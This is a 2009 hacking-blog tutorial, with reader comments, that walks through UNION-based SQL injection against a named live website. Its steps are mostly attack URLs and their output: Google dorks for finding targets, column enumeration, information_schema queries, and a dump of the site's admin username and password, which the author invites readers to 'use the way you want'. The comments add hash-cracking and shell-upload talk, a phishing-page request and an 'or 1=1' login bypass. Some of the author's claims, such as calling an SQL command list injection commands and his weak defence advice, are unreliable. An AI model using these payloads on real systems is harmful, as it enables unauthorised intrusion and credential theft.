by Nishant.

Soni on 08/04/09 at 5:31 pm

We just found a good security expert (Nishant Soni) to teach you some real hard core hacking
stuff, He is going to teach you about SQL Injection, Sniffing, Trojans and many more topics.
Hope you enjoy them.
Welcome to my very first tutorial for SQL Injection on Genius hackers. SQL Injection basically
means to execute a query in the database which is connected to the website to get personal
information out of it, which is not visible to a normal user. Database is most likely to be a part of
the websites, which saves all the information like user names, passwords, posts, replies in it. So
there is a possibility that you might put some commands or queries or requests whatever you
want to call it into the database to get some hidden information out of it.
It is noticed that in the past SQL Injection have been used several times to steal the credit card
information, E-mail address and passwords, because most of the users have same E-mail
address and passwords into all of their E-mail accounts. So if you manage to hack one of the
accounts, you may just get access to all of their accounts. SQL Injection is most likely used by
the “Penetration Testers” to check if the website of their clients is vulnerable to some kind of
attacks to steal the information. Here, in this article I will show you how they do it. There are
some simple terms expected out of you and one of them is that you understand the basic
knowledge of the computer. This tutorial will let you know, how to start? Where to stop? what
to do? And if you have any further queries you can post them here and i will help you to work
with it.
PLEASE REMEMBER: Nishant Soni or Genius Hackers take no responsibility of whatsoever
damaged is made by you by this knowledge. This is just for the educational purposes so you can
secure your own website.
I will divide this tutorial into some points so it can help you in a better way to understand the
structure of the SQL Database which is working at the backend of the website to store, save and
execute the information.
I will use a LIVE website in this tutorial, so you can try to test it on your own and believe me it
really helps to develop your skills.
The website that I will use today is www[dot]rfidupdate[dot]com.
To understand what is an SQL Database, the very simple thing i can explain to you is the
“website where you can register, login or create your own profile. Because it will save the data
you input into your profile and will execute / display them whenever you provide the correct
username or the password. So in the same way the website i mentioned above will give you a
chance to be a part of it, it will update you daily about respective news.
1. How to check if the website is vulnerable to SQL Injection?
A: On most of the website i read people saying that try to add “`” at the end [without quotes],
and if you get some error that means that the website is vulnerable to SQL Injection. But being
an experienced guy in the penetration, i’d rather tell you that this is a TOTAL MYTH. The best
way to check the site vulnerability is to add “+order+by+6753″ at the end of the URL. Because,
97% of the websites don’t have more then 6753. columns. So by adding 6753 number, you will
check if it has 6753 columns, which it apperatenly doesn’t have. So it will give you an error, and
if it does that means that the WEBSITE IS VULNERABLE. It is generally noticed that a
website doesn’t have more than 100 columns at the most in its database. So by entering the
number 6753, you are trying to make it sure if the website gives you an error with it. IF it does
that means you can proceed further. To check an SQL Injection, its mandatory that the website
should be pointing it self to some specific page, i.e. “website.com/index.php?page=11″. So in
this case the website is pointing it self to page Number.11 to pull up some specific information.
So, to check if the website is vulnerable or not, you can try with the following URL. i.e.
“website.com/index.php?page=11+order+by+6753″.
2. How would i find the vulnerable websites?
A.: Google is the best friend of Hackers, when I say this don’t assume that i am just writing it
because i am supposed it. I really mean it. There is something called as “google dorks”, which
are basically a command which could be put into the Google search to find out specific groups of
pages.
here are some Google dorks which you may try to find out the vulnerable websites.
a. inurl:index.php?page=
b. inurl:members.php?member=
c. inurl:index.php?id=
d. inurl:articles.php?page=
This will help you to find out the websites which are connected and working with SQL
Databases at the backend. Some of them might be vulnerable to SQL Injection. So you can try to
put “order+by+6753″ at the end of the URL to check if its vulnerable.
Step 1 : Finding Vulnerable Page.
Lets start, as you’ll know the website that i will test today is www.RfidUpdate.com. So lets open
up the website in the browser. So just a little information about website, RFID means “radio
frequency identification”. So on the right hand side you will see that it gives you an opportunity
to subscribe to the website. So now it should give you an idea that when you subscribe to it, there
has to be a place where your E-mail address should be saved, so it has to have a database! So,
now we know that the website is supported by an SQL Database at the backend. So we are on the
right track.
As I have written earlier, in order to perform an SQL Injection we will have to find a page that
has “something.php?id=2121″ at the end of the URL, so we will try to find such page on
RfidUpdate.com. I have found a page by exploring the website a bit. The URL of the page is,
http://www.rfidupdate.com/articles/index.php?id=1563

Image 1: SQL Injection (Click to enlarge )

So now, we know it has an SQL Database and we have the page where we can start with.
So lets try to check if the website is vulnerable to SQL Attack, we will try to add
“+order+by+6753–” as i have written earlier.
http://www.rfidupdate.com/articles/index.php?id=1563+order+by+6753–
Now, you should have noticed an error, which says :
“Error 1054: Unknown column ‘6753′ in ‘order clause’”
So, It means that the database gave u a message saying “there is no such column”. So error
doesn’t really make any difference, but the main thing we should notice is that the database
communicated with us directly. So there is a possibility that we can exploit it.
Step 2 : Finding Number of Columns.
Now, the next thing we will try is to find the out many columns do this page have. So now,
instead of “6753″, we will start from number 1 then 5 then 15, we will keep doing this unless we
get some error. So, try the following url.
http://www.rfidupdate.com/articles/index.php?id=1563+order+by+1–
The webpage opened up fine, which means that the website has more then 1 column, now try
number 5.
http://www.rfidupdate.com/articles/index.php?id=1563+order+by+5–
Same thing, now try 10.
http://www.rfidupdate.com/articles/index.php?id=1563+order+by+10–
Still no error, try 15.
http://www.rfidupdate.com/articles/index.php?id=1563+order+by+15–
Still no error :(, try 20.
http://www.rfidupdate.com/articles/index.php?id=1563+order+by+20--
WHOA!, We got the error, which means that the number of columns in the webpage is between
15 to 20. So lets try with number “16″ now.
http://www.rfidupdate.com/articles/index.php?id=1563+order+by+16–
YAY!, you got the error on number “16″ as well. Which means, that the website has 15 columns.
So now lets move further.
Step 3 : Using “Union Select All” Command.
Now, we will try to combine all the columns and we will see what do we get, the command goes
as follow:-
http://www.rfidupdate.com/articles/index.php?id=-
1563+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15–
Image 2: SQL Injection (Click to enlarge )
FYI:- please notice tha ti have added “-” before 1563.
Now you see some broken things in there, and now you see that the only independent number of
column you see on the website is “7″. So apparently that would be the base of the attack .
Everything we do now, would be done with the column number “7″.
So we wil ltry to find the some more information about the DATABASE this website is using, so
to do this we can replace the column number 7 with “@@version“, without quotes of course. So
try this now.
http://www.rfidupdate.com/articles/index.php?id=-
1563+union+all+select+1,2,3,4,5,6,@@version,8,9,10,11,12,13,14,15–

Image 3: SQL Injection (Click to enlarge )

This is what you should see now,
“5.0.67-community”
Which means, that the website is using SQL Version > 5. Now, try following URL to move
further.
http://www.rfidupdate.com/articles/index.php?id=-
1563+union+all+select+1,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13,14,15+from%2
0information_schema.tables%20where%20table_Schema=database%20()–

Image 4: SQL Injection (Click to enlarge)

Here, we have replaced No.7 column with “group_concat(table_name)” and we have added
“from information_schema. tables where table_Schema=database ()” at the end. Which are
basically the standard commands for SQL, to get the further information from the specific
column.
YAY! You should have already noticed that the name of the further columns have appeared in the
list and one of them is “ru_Admin”. Thats what we are looking for. Since we have the column for
admin now, we will try to find out the username and password out of it. So let try following URL
into the address bar.
http://www.rfidupdate.com/articles/index.php?id=-
1563+union+all+select+1,2,3,4,5,6,group_concat(column_name),8,9,10,11,12,13,14,15+from%
20information_schema.columns%20where%20table_Schema=database%20()–
The only thing we’ve changed here is the “tables” to “columns”, and you should see all the
information about the admin’s tables now which should look something like following.
“ru_Admin_Username,ru_Admin_Password”
So we see, we might be able to crack the username as well as the password. In order to see the
information inside the username and the password column lets put following URL:
http://www.rfidupdate.com/articles/index.php?id=-
1563+union+all+select+1,2,3,4,5,6,group_concat(ru_Admin_username,0×3a,ru_Admin_passw
ord),8,9,10,11,12,13,14,15+from%20ru_Admin–
What we did is, to replace the columns names with admin_username & admin_password, and
call it from ru_Admin column at the end.

Image 5: SQL Injection (Click to enlarge )

VOILA! What you’re looking at right now the “admin” username and the password in following
format.
username : password.
admin:admRIvuxHahkQ
FYI: Wherever you see “%20″ in the URL, that means a SPACE in the address bar.
So you have the password now, you can use it the way you want!.
So this the way to perform an SQL Injection attack. You may try your own stuffs with the google
dorks i posted in the beginning. Use it the way you want, just keep in mind that if u know
80/100, there are people out there who know 90/100. So better secure yourself first, and try
these attacks with the permission of the site owners.
Thank you all for reading this tutorial, I am sure it helped. If there are any more questions feel
free to revert back to the same post.

Enjoy Ethical hacking

Little About Me:
I am from Mumbai, have been in Australia and U.S. for few years, and my website could be
found at www.TechMafias.com
GH-Exclusive, Hacking
, Hacking, sql injection, web hacking, website attacks
Related Posts
• XSS (Cross Site Scripting)
• How To Defend An Input Validation Attack
• Reveal the passwords behind ****
• Connect to any computer in the world using TeamViewer
Stay Updated
You don't wanna miss our articles. Really!

Grab the RSS feed Or, Subscribe via E-Mail

Enter your e-M http://feeds.feedb GeniusHackers.c en_US Subscribe

42 Responses to “SQL Injection : Ultimate method for Website Hacking.”

1.
Ashwin
Apr 8th, 2009
Thank you very much.

2.
rAX
Apr 9th, 2009
Thank you so much for the effort, it’s really educative !
I want to ask you though, what do I need to learn to be a penetration expert? (for good
purpose).
3.
tez2fast
Apr 9th, 2009
Thats Nice 1 Man,… keep On Such Thing,..

4.
irad
Apr 9th, 2009
thank you….thank you very much

5.
Nishant.Soni
Apr 9th, 2009
@ rAX,
Penetration is a field where you need to gain the knowledge first and then the practical
experience, more you explore better you learn. This is the ONLY field which is never
gonna die.
There are different types of ETHICAL HACKERS, some of for APPLICATION BASED
TESTING, some work for WEB TESTING, so it depends where do you want to
expertise.

6.
Tejas Dave
Apr 9th, 2009
lol…..Nishant no offence but im sure u cannot hack sites using sql injection anymore &
the passwords u get in sql are in md5 formats or salted md5 so u cant use dem
directly.plus direct xml parsing is now old & can b used for hacking small sites which r
not even worth a single $.

7.
Tejas Dave
Apr 9th, 2009
 & yes new ways of hacking sites are by rooting servers.thats called real hacking & if u

want some examples or tutorials den i can provide u wid dem

8.
Nishant.Soni
Apr 9th, 2009
@Tejas Dave:
We are talking about ETHICAL HACKING In here, and if you are saying that we can not
hack the site with SQL Injections, then I am sorry but you’re completely wrong.
1. MD5: Use Cain & Able to decrypt the md5 hashes, its decrypted with the help of
bruteforcing attack.
2. I am soon gonna write another article about “uploading shells” with sql injection, so
that will basically grant u access to the entire http://ftp.
3. You can easily manipulate config.php with the sql injection, and u can make it
vulnerable to RFI or LFI [if u know about them]
4. As far as rooting is concerned, i thought not to post it since I wasn’t sure if the readers
are good enough to understand it in just one go.

9.
Nishant.Soni
Apr 9th, 2009
Yea one more thing, for the MD5 hash cracking, you can have a look at this video.
http://techmafias.com/forum/Thread-decrypting-md5-hashes

10.
john clay
Apr 9th, 2009
well , a nice read material.
will love to have more of this to read…simple and straight to the point.
1love Bro.

11.
tejas dave
 Apr 9th, 2009
dude ur telling me that using cain & able u can crack all md5?r u joking.u can crack
normal md5 but not salted hashes.

12.
Sharad
Apr 9th, 2009
I just looking for this.
Thanks

13.
Randheer Singh
Apr 10th, 2009
Thanks very much. I was building a website now I can think on these attacks.

14.
Nishant.Soni
Apr 10th, 2009
@tejas_dave:
Most of the hashes are normal MD5s and if the website is using some specific software
like some forum through SMF, phpBB,myBb or a blog like wordpress then the hashes are
converted into respective flavors. As far as decrypting the SALTED and the SHVA hashes
are concerned, i will write an article soon about that.
Please ask your questions out of curiosity, your question are more about agression and
offense rather then confusion, objection or dbout. We are here to share the knowledge, if
you think you something on top of this, then try to write an article, don’t try to create a

chaos.
P.S.: Please remember, i try to teach ETHICAL, i wudn’t suggest any one to missuse it.

15.
Nishant.Soni
Apr 10th, 2009
Here is a list of SQL Injection commands / queries which you may try to understand it
better.
ABORT — abort the current transaction
ALTER DATABASE — change a database
ALTER GROUP — add users to a group or remove users from a group
ALTER TABLE — change the definition of a table
ALTER TRIGGER — change the definition of a trigger
ALTER USER — change a database user account
ANALYZE — collect statistics about a database
BEGIN — start a transaction block
CHECKPOINT — force a transaction log checkpoint
CLOSE — close a cursor
CLUSTER — cluster a table according to an index
COMMENT — define or change the comment of an object
COMMIT — commit the current transaction
COPY — copy data between files and tables
CREATE AGGREGATE — define a new aggregate function
CREATE CAST — define a user-defined cast
CREATE CONSTRAINT TRIGGER — define a new constraint trigger
CREATE CONVERSION — define a user-defined conversion
CREATE DATABASE — create a new database
CREATE DOMAIN — define a new domain
CREATE FUNCTION — define a new function
CREATE GROUP — define a new user group
CREATE INDEX — define a new index
CREATE LANGUAGE — define a new procedural language
CREATE OPERATOR — define a new operator
CREATE OPERATOR CLASS — define a new operator class for indexes
CREATE RULE — define a new rewrite rule
CREATE SCHEMA — define a new schema
CREATE SEQUENCE — define a new sequence generator
CREATE TABLE — define a new table
CREATE TABLE AS — create a new table from the results of a query
CREATE TRIGGER — define a new trigger
CREATE TYPE — define a new data type
CREATE USER — define a new database user account
CREATE VIEW — define a new view
DEALLOCATE — remove a prepared query
DECLARE — define a cursor
DELETE — delete rows of a table
DROP AGGREGATE — remove a user-defined aggregate function
DROP CAST — remove a user-defined cast
DROP CONVERSION — remove a user-defined conversion
DROP DATABASE — remove a database
DROP DOMAIN — remove a user-defined domain
DROP FUNCTION — remove a user-defined function
DROP GROUP — remove a user group
DROP INDEX — remove an index
 DROP LANGUAGE — remove a user-defined procedural language
DROP OPERATOR — remove a user-defined operator
DROP OPERATOR CLASS — remove a user-defined operator class
DROP RULE — remove a rewrite rule
DROP SCHEMA — remove a schema
DROP SEQUENCE — remove a sequence
DROP TABLE — remove a table
DROP TRIGGER — remove a trigger
DROP TYPE — remove a user-defined data type
DROP USER — remove a database user account
DROP VIEW — remove a view
END — commit the current transaction
EXECUTE — execute a prepared query
EXPLAIN — show the execution plan of a statement
FETCH — retrieve rows from a table using a cursor
GRANT — define access privileges
INSERT — create new rows in a table
LISTEN — listen for a notification
LOAD — load or reload a shared library file
LOCK — explicitly lock a table
MOVE — position a cursor on a specified row of a table
NOTIFY — generate a notification
PREPARE — create a prepared query
REINDEX — rebuild corrupted indexes
RESET — restore the value of a run-time parameter to a default value
REVOKE — remove access privileges
ROLLBACK — abort the current transaction
SELECT — retrieve rows from a table or view
SELECT INTO — create a new table from the results of a query
SET — change a run-time parameter
SET CONSTRAINTS — set the constraint mode of the current transaction
SET SESSION AUTHORIZATION — set the session user identifier and the current user
identifier of the current session
SET TRANSACTION — set the characteristics of the current transaction
SHOW — show the value of a run-time parameter
START TRANSACTION — start a transaction block
TRUNCATE — empty a table
UNLISTEN — stop listening for a notification
UPDATE — update rows of a table
VACUUM — garbage-collect and optionally analyze a database

16.
XERO
Apr 11th, 2009
 HI
Excellent tutorial and it cleared my doubts. However I would like to ask if there are ways
to hack PHP pages with similar encoding like SQL injections ? I would like to ask if there
are similar techniques involved in hacking PHP based username pass forms or websites ?
Thanks
-XERO

17.
prashanth
Apr 11th, 2009
i need to make a fake login page for hotmail…
Can you help me with it??
if you can then mail me to “prashanth_s@live.com”

18.
Nishant.Soni
Apr 12th, 2009
@XERO.
It really depends if there are some vulnerabilities in that php page. If you can give an
example of the page you’re talking about, it would be easier for me to help you.

19.
Syed.atif
Apr 13th, 2009
Hello
Nishant.Soni
i am just a network guy, this artical came across me so Just want to request that as an
expert of Penetration can u also provide tips and suggestion to secure the sites for this
sort of attacks.
regards

20.
Ajaykumar
Apr 14th, 2009
 hiiiiiii i’m new to SQL but i unerstood the concept of ur injection.but i dont know what to
do that ADMIN username and password.
where shal i use them???

21.
Ajaykumar
Apr 14th, 2009
at the last of the ur injection we get only admin username only but not the password but u
r showing it

22.
Nishant.Soni
Apr 14th, 2009
@ Syed.atif :- To secure the website from this kind of attack, you have to make sure that
your website doesnt follow every path. I mean it should be redirected to the index page if
some unknown page is attempted to access.
@Ajay kumar: With the admin username and password, you can login to “admin control
panel”. Thats ur job to find it. Because i wudn’t prefer to show the admin control panel
on that site in here.

23.
Drexler
Apr 17th, 2009
Thanks for this leason hummm so interesting,…am new here dough but while going
through the process, most of the link displayed error. from the step 2 down. Anyway keep
it up…you good…cheer

24.
Ajaykumar
Apr 17th, 2009
But how can i know the admin page who is providing data base to the site.I’m in initial
stages plss help me
25.
Ajaykumar
Apr 17th, 2009
@Drexler:: hey they are working links from step 2 u have to remove “-” at the end of the
links .
ru getting me

26.
Vinayak
Apr 18th, 2009

Thanks Nishant A Very Useful Tutorial I Have Found The Admin Login Page But To
Login Do I Need To Use Any Proxy ???

27.
Nishant.Soni
Apr 19th, 2009
@Vinayak:
1. I don’t support un-ethical stuffs
2. Everyone can track the login logs in admin control panel
3. Rather then trying to mess with the site, i will suggest you to contact the website owner
and let them know about the vulnerability.

28.
Parag
Apr 19th, 2009
Dude the link at the end which leads to username and password
does not work.

29.
Nishant.Soni
 Apr 19th, 2009
@Parag:
Since i’ve copy pasted the links, the format has been disordered. So, you will have to

manually type it into your address bar. It will work

30.
askoppal
Apr 19th, 2009
@Nishant.Soni
MD5(Message-Digest algorithm 5) is an irreversible hash which cannot be ‘decrypted’.If
anybody said it can be decrypted its just NONSENSE.
Now you may be thinking how Cain & Able and other sites decrypt those MD5 hashes,its
done by a simple technique.
Just type in text and produce a MD5 encryption of that text. The text and the MD5 hash is
then inserted into a table. To ‘decrypt’, cain and able just search in that table for similar
hashes, known as an MD5 rainbow table.
If I have a password “genius” or “hacker”.You can find it easily on that table because its
common words.That’s the reason you shouldn’t use common words as passwords.
But if I have a password like “278askoppal345″ chance of being in the database, and is
unlikely anyone in the world has the same password. Therefore, it has very “little chance”
of ending up in a database.
If you want to make it even more secured against decryption (for covering those “little
chances”)we use a common technique called salt the password thats what Tejas Dave
have mentioned.I will just explain one method of it i.e. adding characters along with
password before its being hashed.Even if my password is in the rainbow table the hacker
cannot decrypt my password because he doesn’t know my salting technique.
Secondly,
You cannot have an article on “decrypting salted md5 and SHA” . Because its pointless

like making coffee and asking to “decrypt” the milk from it.
-askoppal.com
“My ignorance always amuses me”

31.
Nishant.Soni
Apr 20th, 2009
@ askoppal.
 1. I like you, because ur the best person who knows how to divert minds from actual
topic.
2. What you’re talking about is just CRACKING, what i referred to was “Brute forcing”
MD5s.
3. Nice example of coffee and milk, i know u cant decrypt milk out of coffee, but yes you
can understand that coffee has, milk, sugar etc..
4. Y i don’t see any of your articles “mate”!?

32.
Nishant.Soni
Apr 20th, 2009
@ Askoppal:
Sorry i forgot to add.
1. When we talk about MD5, we dont say “hack”, we say “crack”. So it should come to
your mind that, the word “crack” means a possibility not certainty.
2. Thats why people release their “dictionaries” so they can be used for “dictionaries
cracking attempts”
3. and atlast i ‘ve already wrote about brute forcing above.

33.
askoppal
Apr 20th, 2009
@Nishant.Soni
NISHANT: I like you, because ur the best person who knows how to divert minds from
actual topic.
ASKOPPAL:I am just questioning the statements you made.
NISHANT: What you’re talking about is just CRACKING, what i referred to was “Brute
forcing” MD5s.

ASKOPPAL:You make me laugh…. Bruteforcing is a way of cracking.I was talking

about PRECOMPUTATION in my comments.
Dude its impossible to decrypt MD5 using the method “Brute forcing”
You may find internet articles or post where people relate brute forcing and MD5 but its a
common mistake,The method they actually mean is “precomputation” (Using rainbow
tables).
If you are so particular that you can do it please decrypt this normal MD5 hash (It is not
salted) which is an easy guess for a security expert like you -
fedd0876f12728f8ef6890fbfed25edd
 GH audience will be eager to see you decrypting those, don’t disappoint them Nishant.
NISHANT: Nice example of coffee and milk, i know u cant decrypt milk out of coffee,
but yes you can understand that coffee has, milk, sugar etc..
ASKOPPAL:You wont know coffee has adequate amount of milk and sugar unless you

taste it
NISHANT: Y i don’t see any of your articles “mate”!?
ASKOPPAL: I blog at http://45k.me sponsored by Sathish
NISHANT:When we talk about MD5, we dont say “hack”, we say “crack”. So it should
come to your mind that, the word “crack” means a possibility not certainty.Thats why
people release their “dictionaries” so they can be used for “dictionaries cracking
attempts” and atlast i ‘ve already wrote about brute forcing above.
ASKOPPAL: You are proving yourself to be a jackass or an english mentor or something
else.The above statement is just nonsense.
-askoppal.com
“My ignorance always amuses me”

34.
askoppal
Apr 22nd, 2009
The hash value fedd0876f12728f8ef6890fbfed25edd which I gave to Nishant is decrypted
to N.i.s.h.a.n.t S.o.n.i
You can confirm the accuracy of the hash using an on-line hash generator created by me
http://45k.me/blog/2009/04/md5-sha1-sha256-hashing/
If we use a Bruteforce method it would took around 262800 hrs. i.e. 30 years in a 3 Ghz ,
2Gb RAM equipped system to decrypt the above hash even if i know the keyspace of the
password.So Brute force ain’t a good technique to crack admin’s password.
-askoppal

35.
Nishant.Soni
Apr 23rd, 2009
@askoppal:
That is the only reason i said it isnt 100%. MD5 is a nice algorithm. It may work it may
not. OR u may have to wait for a long time.
36.
raaghav
Apr 23rd, 2009
nice totorial , i ll try it on other sites too

37.
Panwar
Apr 27th, 2009
Thanks for nice article everything is clear but i am stuck at two points.
1-How to find sites where we can put sql injections as you described it well but if you plz
put some more light on it then it will be very usefull.
2-Last url is not working to get username and password as i have also added code
manually in second last url, i mean i add admin_username & admin_password and put
ru_Admin but no work.
Also from where we have to start learning from newbie to expert, so we can safe our sites
?

38.
junaid
Apr 28th, 2009
thanks, it really helping

39.
xXXh4Ck3rXXx
Apr 28th, 2009
hey dude the tuts if u make a video becomes more user friendly
and try and teach others advanced thing this is t00 n00bish

and too basic

40.
 Neo_Warez
May 1st, 2009
Dude!
I love this post, i think this is the first time i’m posting here on Genius Hackers…..I love
ur post!!

41.
des
May 5th, 2009
Hello Nishant,
I wonder what is your nick name on techm forum, I would like to have your opinion on
the topic, which I recently open there.
thx.

42.
Kalpana
Jun 2nd, 2009
hi Nishant
Thanks its a good article. My question is can we login in to a web page without userid
and pwd???
i read an article by viewing web page source we can login
ex: ‘ or 1=1– using these types